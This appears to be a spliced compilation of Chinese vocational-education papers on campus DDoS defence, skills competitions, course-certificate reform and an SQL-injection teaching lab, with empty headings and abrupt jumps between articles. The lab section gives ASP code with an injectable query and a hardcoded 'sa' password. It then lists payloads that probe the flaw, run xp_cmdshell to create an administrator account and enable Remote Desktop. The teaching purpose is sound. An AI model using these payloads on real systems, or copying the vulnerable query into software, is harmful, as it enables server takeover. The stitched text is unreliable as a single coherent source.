1)校园网硬件方面。首先是从网络结构上要设置合理。校园网一般采用核心、汇聚、接入三个网络结构层次,重要应用系统应设置成中立区。采用VLAN技术对校园网进行针对性的划分,如划分为学生区、教学区、宿舍区、实训区等,并根据各子网的安全保密程度进行合理分布,防止局部安全性较低的网络系统造成的威胁传播到整个网络系统,这种结构为实施DDoS攻击检测提供了良好地基础。其次是采用高性能的网络系统设备和安全设备。设置防火墙,充分发挥防火墙的过滤、NAT转换、安全访问控制、漏洞防范等功能和防DDoS攻击属性,有效地防止DDoS攻击的入侵。设置IPS即入侵防御系统。IPS入侵防御系统是一种主动式的安全防护设备,在不影响网络性能的情况下发现非法的入侵行为,对来自网络内外的DDoS攻击行为进行实时保护。Cisco、H3C、华为等主流设备厂商均有很好的网络与安全设备,这些设备对DDoS攻击的策略设置是采用WEB界面方式进行设置的,方便简单。可以使IPS和防火墙的安全策略相互配合,防范DDoS攻击的效果更加明显。再次要有充足的网络带宽。带宽越大,防DDoS攻击能力越强。
我校在校园网的日常安全管理上想了很多办法,如经常使用ping命令和netstat一an命令对网络进行测试,检测网络服务器访问情况等。对网络安全设备的安全策略进行调试,以适应网络应用系统的变化。通过采取一系列措施后,对DDoS攻击行为达到了较好地防御目的。
[1]黑客解密攻击方法,阐述如何防御攻击.中国经济网httP:///cysc/tech/itsh/200803/03/t20080303_14706816.shtml,2008.3.
[2]金忠伟.黑龙江畜牧兽医职业学院校园网安全体系建设[D].哈尔滨理工大学,2007:3-4.
[3]FelixLau,StuartH.Rubin,MichaelH.Smithetal.Distributeddenialofserviceattacks.In:IEEEInternationalConferenceonSystems,Man,andCybernetics.Nashville,October2000,Pages:2275-2280.
一、职业技能竞赛对实践教学的促进作用
2014年《国务院关于加快发展现代职业教育的决定》中就提出“推进人才培养模式创新。坚持校企合作、工学结合,强化教学、学习、实训相融合的教育教学活动。……开展职业技能竞赛。”2016年全国职业院校技能大赛中职组的“网络搭建与应用”赛项规程也明确了竞赛内容,是“通过对计算机网络和集成企业进行调研和分析,根据行业企业业务背景进行网络业务需求分析、技术应用环境分析、理解实际的工程应用与业务架构分析。中职计算机网络专业毕业生主要从事系统集成、系统应用、网络工程、网络安全及售后技术支持等五个岗位,竞赛内容即岗位工作主要内容”。由此可见,计算机网络专业的学习内容就是中职毕业生今后要主要从事的工作,要和企业需求形成无缝对接。在广西壮族自治区,无论是学生层面还是在教师层面,“网络搭建与应用”项目都是职业技能大赛中的常设项目。该项目不但能很好地检验学生的技能水平,也检验教师的技能水平及指导能力。职业技能竞赛与日常实践教学结合,不仅能激发学生的学习热情,提高学生的实践动手能力,也能帮助学校建设“双师型”教师队伍,提高技能教学质量,从而使“以赛促学、以赛促教”成为真正有效的教学手段。
二、实施过程中遇到的问题
三、经验总结
四、小结
笔者学校基于“计算机网络搭建与应用”竞赛项目,从实践教学的硬件和软件方面着手,已初步实现“以职业技能比赛为平台,以增强学生的实践动手能力和创新精神为基本导向,以提高学生综合素质,增强就业竞争力为目标”的实践教学方式。但探索中待解决的问题仍有许多,还需积极研究和探索,以期为同类中职校学生职业技能培养途径和方法提供思维启发和经验借鉴,丰富中职校人才培养模式。
作者:欧秋菊单位:广西电子高级技工学校
[1]翁敏峰.高职院校《计算机网络基础》课程教学研究[J].电脑知识与技术,2010(02Z).
关键词:高职;网络专业;课证融合;教学改革
“课证融合”的内涵
“课”,即课程,广义的课程是指学校为实现培养目标而选择的教育内容及其进程的总和,包括学校所教的各门学科和有目的、有计划的教育活动;狭义的课程是指某一门学科的具体教学内容。
“证”,即证书,是指国家的职业资格证书或社会的技能证书,它表明就业者掌握的实际操作能力和职业胜任能力。这一类证书的显著特点是与职业岗位的具体要求结合密切,能更直接、更准确地反映特定职业的技能标准和操作规范。
“课证融合”的背景
随着市场竞争日益激烈,愈来愈多的用人单位由过去单纯看重应聘人员的学历层次转而看重其实际技能水平,而应聘者是否拥有相应的职业资格证书无疑是评测其技能水平最快捷的方法。这一转变对高职教育是契机,也是挑战。
“课证融合”将职业资格标准要求引入常规的教学体系,为学生免去了社会认证培训的高额费用,在减轻学生经济负担的同时可切实提高学生的就业竞争力。所以,一经推出便广受好评。因此,在高职院校推行“课证融合”已逐渐成为实施“双证”制度的主要方式。
“课证融合”的现状
“课证融合”教学改革的实践探索
我院网络技术专业本着“以就业岗位为导向,以职业能力为本位,以资格认证为载体”的原则,自2008年起推行了针对计算机网络组建及安全维护方向的“课证融合”教学改革。经过反复总结与实践,笔者提出了“岗位逆推认证品牌,三元共促课证融合”的教改模式,其具体框架如图1所示。
三元素共促课证融合从平面化的资格认证到过程化的课程建设,需要“双师队伍、双证教材、实训基地”三元素共同促进,方能搭建起“课程”与“证书”间的互连桥梁(如上页图1所示),最终实现“课”与“证”二者的无缝对接。
2.双证教材。“双证”教材不同于社会认证教材,也不同于传统的高职教材,应是能同时满足高职学历教育和职业资格认证双重需求的教材。其特征应以职业性内容为主,以学术性内容为辅,以任务引领为出发点,强调职业能力的培养,还需要综合考虑多方面的因素,如知识与应用结合、学时数、学生接受能力等。笔者结合我院网络专业的实际情况,以H3C网络学院教材为蓝本,采用任务驱动模式自行编写了对应的校本教材和讲义,以典型项目案例为任务切入点,在完成工作任务的过程中介绍知识,将教学大纲、教学内容、教法、教案融为一体,成为“四位一体”的教材。这样的教材简明实用,可降低学生学习的难度,提高学生学习的兴趣,贴近我校学生实际。当然,“双证”教材的编撰工作还应实时跟踪企业,吸取行业专家的建议,不断改善校本教材,与时俱进,以适合行业发展需要。
实践证明,上述“课证融合”模式的教学改革工作已初见成效,学生就业竞争力明显增强,但高职网络专业“课证融合”的教学改革仍属初级阶段,笔者提出的某些方式和方法仍需进一步深入论证和完善。
[1]章安平.基于职业导向的“课证融合”人才培养模式研究与实践[M].北京:高等教育出版社,2009.
[2]高林,许远,张方.职业院校“双证书”教学工作的研究——关于职业技术教育教学改革的思考[J].中国职业技术教育,2006(5).
[3]姜大源.职业教育学研究新论[M].北京:教育科学出版社,2008.
作者简介:
李益(1974—),女,浙江嵊州人,硕士,北京政法职业学院讲师,研究方向为计算机网络系统集成、计算机网络安全。
关键词:高职院校;SQL注入攻击;实验环境;网络安全
研究意义
SQL注入攻击是黑客攻击最常用的手段之一,其危害极大。一些不具备很多网络安全技术的“脚本小子”,使用一些傻瓜式SQL注入攻击工具,就可能攻陷网站,进而控制服务器。
高职院校的《网络安全与防范》课程,具有培养学生掌握较高网络安全防范技能的任务。因此,必须使学生掌握好SQL注入攻击的防范措施。而为了真正掌握SQL注入攻击的防范措施,又必须透彻理解SQL注入攻击的原理和具体实施步骤。经验表明,这是一个教学难点,因为它需要精心构造SQL语句,来完成信息的查询、语句的执行等。
我们开展了一项教学改革,旨在提高《网络安全与防范》课程的教学效果。该教学改革中的一项内容,就是研究如何更好地开展SQL注入攻击的教学。我们认为,如果能够搭建一个简单的具有SQL注入漏洞的动态网站,让学生对这个网站进行模拟攻击,对于学生更好地掌握SQL注入攻击的原理和具体实施步骤具有很大好处,也能让他们更好地掌握相应的安全防范措施。
SQL注入攻击实验环境的搭建
我们使用VMwareWorkStation虚拟机软件安装了两台虚拟机,一台虚拟机安装的是WindowsServer2003操作系统,用于模拟被攻击的服务器,IP地址为192.168.248.132;另一台虚拟机安装的是WindowsXP操作系统,用于模拟黑客使用的攻击机,IP地址为192.168.248.133。在WindowsServer2003虚拟机上,搭建了一个使用ASP+SQLServer2000开发的简单的动态网站。我们设计该动态网站的思路是:该网站具有SQL注入漏洞,能满足SQL注入攻击的实验要求;该网站应该尽量简单,以便于学生理解、分析和掌握。
按照以上设计思路,我们开发了一个简单的名为testweb的动态网站。该动态网站需要访问一个名为testweb的数据库,该数据库包含一个表:tblNews。tblNews用来保存新闻的标题和内容,初始时在这个表中输入了一些测试用的数据。它的具体结构如表1所示。
该网站包括以下三个页面:conn.asp、news.asp、displayNews.asp。其中conn.asp用于保存与SQLServer2000数据库服务器的连接信息;news.asp用于读取数据库中的新闻记录,显示所有新闻的标题,并且将这些标题以超链接的形式显示。当单击某个新闻的标题后,即可以进入形如displayNews.asp?id=xxx的页面,看到新闻的具体内容(其中“xxx”表示某条新闻在tblNews表中ID字段的值)。设置该网站的默认页面为news.asp。
conn.asp的代码如下所示:
ConstSqlDatabaseName="testweb"
ConstSqlPassword="michaeljordan"
ConstSqlUsername="sa"
ConstSqlLocalName="(local)"
dimConnStr
ConnStr="Provider=Sqloledb;UserID="&SqlUsername&";Password="&SqlPassword&";InitialCatalog="&SqlDatabaseName&";DataSource="&SqlLocalName&";"
news.asp的代码如下所示:
Dimconn
Setconn=Server.CreateObject("ADODB.Connection")
conn.openConnStr
dimstrSql
strSql="select*fromtblNews"
dimrs
setrs=conn.Execute(strSql)
dimnewsID
response.Write("")
whilenotrs.EOF
newsID=rs("ID")
response.Write(""&rs("title")&"")
rs.MoveNext
wend
rs.close()
conn.close
setrs=nothing
setconn=nothing
%>
displayNews.asp的代码如下所示:
newsID=request("id")
strSql="select*fromtblNewswhereID="&newsID
response.Write(rs("content"))
%
从以上三个页面的具体代码可以看出,我们所设计的动态网站具有简单,易于理解、分析和掌握的优点。
同时页面displayNews.asp有SQL注入漏洞,可以满足SQL注入攻击的实训需要,其具有SQL注入漏洞的具体语句为:strSql="select*fromtblNewswhereID="&newsID,该语句根据某条新闻的ID查询tblNews表的内容。我们可以在形如displayNews.asp?id=xxx的地址后面加入精心构造的语句,从而执行特定的SQL语句,控制服务器。
SQL注入攻击实验环境的使用
(一)判断网站是否有SQL注入漏洞
页面返回如下错误信息:
MicrosoftOLEDBProviderforSQLServer错误'80040e14'
字符串''之前有未闭合的引号。
/testweb/displayNews.asp,行13
从以上提示信息可以看出,数据库服务器为SQLServer。(1)的原理是:正常的SQL语句为select*fromtblNewswhereID=1,而(1)导致SQL语句成为:select*fromtblNewswhereID=1’,这样会使得单引号没有闭合而出错。
248.132/testweb/displayNews.asp?id=1and1=1(2)
(3)
返回的错误信息是:
ADODB.Field错误'80020009'
BOF或EOF中有一个是“真”,或者当前的记录已被删除,所需的操作要求一个当前的记录。
/testweb/displayNews.asp,行0
(2)导致SQL语句成为:select*fromtblNewswhereID=1and1=1,因为1=1为永真式,所以不影响原来的查询结果,返回正常页面。而(3)导致SQL语句成为:select*fromtblNewswhereID=1and1=2,因为1=2为永假式,所以查询结果为空,而程序中没有对此进行处理,所以导致出现错误提示信息。
通过以上测试,可以明确地知道网站存在SQL注入漏洞,而且数据库服务器为SQLServer。
(二)查找是否有xp_cmdshell扩展存储过程
248.132/testweb/displayNews.asp?id=
1andexists(select*frommaster.dbo.sysobjectswherename=’xp_
cmdshell’)
页面返回正常,从而知道master.dbo.sysobjects表中存在扩展过程xp_cmdshell。通过执行xp_cmdshell存储过程可以实现添加用户、将用户添加到管理员组、开启远程终端连接等许多操作。
(三)通过xp_cmdshell添加系统管理员账户
1;execmaster..xp_cmdshell‘netusertesttest/add’(4)
页面返回正常。执行该语句后,可以添加一个名为test,密码也为test的账户。(4)的原理是:通过xp_cmdshell扩展存储过程,执行netuser命令,实现添加账户的操作。
248.132/testweb/displayNews.asp?id=1;execmaster..xp_cmdshell‘netlocalgroupadministratorstest/add’
页面返回正常。执行该语句后,可以将账户test添加到系统管理员组。
(四)开启目标计算机的远程终端连接
1;execmaster..xp_cmdshell‘regadd“HKLM\System\CurrentControl-
Set\Control\TerminalServer”/vfDeny
TSConnections/tREG_DWORD/d0/f’(5)
讨论
同时,利用该实验环境,或者对该实验环境稍微进行扩展,我们还可以进行更多的SQL注入攻击演练,如猜解数据库、表、字段的数目、字段的名称、字段的内容等等。
我们的教学经验表明,通过使用这个简单的实验环境,教学效果能得到明显的提升。
[1]肖遥.大中型网络入侵要案直击与防御[M].北京:电子工业出版社,2011.
[2]朱锡华,刘月铧,侯伟.暗战亮剑——黑客渗透与防御全程实录[M].北京:人民邮电出版社,2010.
[3]武新华,陈艳艳,王英英.矛与盾:黑客攻防与脚本编程[M].北京:机械工业出版社,2010.